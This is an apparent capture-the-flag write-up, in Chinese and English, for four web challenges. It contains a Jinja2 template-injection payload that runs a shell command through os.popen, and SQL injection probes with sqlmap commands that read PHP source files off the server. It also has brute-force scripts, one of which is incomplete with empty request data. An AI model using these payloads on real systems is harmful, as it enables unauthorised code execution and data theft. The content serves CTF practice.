2021-4-19

2021-4-24

# Challenges

## Web

### Emdee five for life

easy 题

import requests
import re
import hashlib

url = "http://46.101.53.249:32444/"

while(1):

r = requests.session()
resp = r.get(url)
code = re.findall("<h3 align='center'>(.*?)</h3>", resp.text)
code = code[0]
print(code)
m = hashlib.md5()
b = code.encode(encoding='utf-8')
m.update(b)
str_md5 = m.hexdigest()
print(str_md5)

data = {
'hash': str_md5
}
resp1 = r.post(url=url, data=data)
print(resp1.text)
if ("Too slow!" in resp1.text):
continue
else:
print(resp1.text)



### Templated

easy 题

{{ "".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag*").read() }}


### Phonebook

Easy题

import requests
data = {
}
input_data = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","#","\$","%","@","!","0","1","2","3","4","5","6","7","8","9","{","}","[","]","_","&","^"," "]
while(1):
for i in input_data:

data = {
}

resp = requests.post(url=url,data=data)
if("/search" in resp.text):
print(data)
break
else:



### FreeLancer

/portfolio.php?id=2 and 1=1--+ 回显正常
/portfolio.php?id=2 and 1=2--+ 回显失败


dump下数据库

sqlmap -u "http://206.189.121.131:31196/portfolio.php?id=1" --file-read=/var/www/html/index.php


sqlmap -u "http://206.189.121.131:31196/portfolio.php?id=1" --file-read=/var/www/html/portfolio.php


sqlmap -u "http://206.189.121.131:31196/portfolio.php?id=1" --file-read=/var/www/html/administrat/index.php


sqlmap -u "http://206.189.121.131:31196/portfolio.php?id=1" --file-read=/var/www/html/administrat/panel.php


